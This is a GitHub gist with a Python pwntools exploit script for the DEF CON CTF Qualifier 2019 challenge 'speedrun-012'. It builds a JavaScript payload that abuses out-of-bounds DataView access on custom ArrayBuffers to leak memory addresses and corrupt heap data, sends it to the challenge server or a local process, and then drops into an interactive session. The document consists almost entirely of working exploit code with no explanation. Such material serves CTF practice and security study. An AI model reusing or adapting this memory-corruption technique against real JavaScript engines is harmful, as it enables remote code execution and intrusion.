Skip to content

Instantly share code, notes, and snippets.

@ducphanduyagentp
Forked from hama7230/exp.py
Created May 13, 2019
Embed
What would you like to do?
DEF CON CTF Qualifier 2019 speedrun-012
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./speedrun-012')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
RHOST = "speedrun-012.quals2019.oooverflow.io"
RPORT = 31337
LHOST = "127.0.0.1"
LPORT = 31337
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./speedrun-012'], gdbscript=gdbscript)
else:
conn = process(['./speedrun-012'])
# conn = process(['./speedrun-012'], env={'LD_PRELOAD': ''})
if opt == 'a': gdb.attach(conn)
# exploit
log.info('Pwning')
payload = 'var buffer = new OOOArrayBufferOOO(16);'
payload += 'var oob = new OOOArrayBufferOOO(0x8); var oob8 = new DataView(oob);'
payload += 'oob8.setUint8(0, 0xde); oob8.setUint8(1, 0xad);'
payload += 'var view = new DataView(buffer);'
payload += 'view.setUint32(0x8e80, 0x1adbeef);'
payload += 'view.setUint32(0x8e84, 0x1adbeef);'
payload += 'view.setUint32(0x8e98, 0x1adbeef);'
payload += 'var leak_l = oob8.getUint8(0x1bf0) + (oob8.getUint8(0x1bf1) << 8) + (oob8.getUint8(0x1bf2) << 16) + (oob8.getUint8(0x1bf3) << 24) + 0x1bd8;'
payload += 'var leak_h = (oob8.getUint8(0x1bf4) ) + (oob8.getUint8(0x1bf5) << 8);'
payload += 'var l = ((leak_l & 0xff) << 24) + ( ((leak_l & 0xff00)>>8) << 16) + (((leak_l & 0xff0000)>>16) << 8 ) + ((leak_l & 0xff000000) >> 24) ;'
payload += 'var h = ((leak_h & 0xff) << 24) + ( ((leak_h & 0xff00)>>8) << 16) ;'
payload += 'if (leak_l < 0) { l += 0x100};'
payload += 'oob8.setUint32(0x100, l);'
payload += 'oob8.setUint32(0x104, h);'
payload += 'var x = new OOOUint32ArrayOOO([h, l-0x55e53a00]);'
payload += 'var y = (new OOOFloat64ArrayOOO(x.buffer))[0];'
payload += 'var q = new OOOArrayBufferOOO(0xf0); '
payload += 'var p = new OOOArrayBufferOOO(0xf0); '
payload += 'var l = new DataView(p);'
payload += 'l.setFloat64(0x50, y);'
conn.sendline(payload)
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment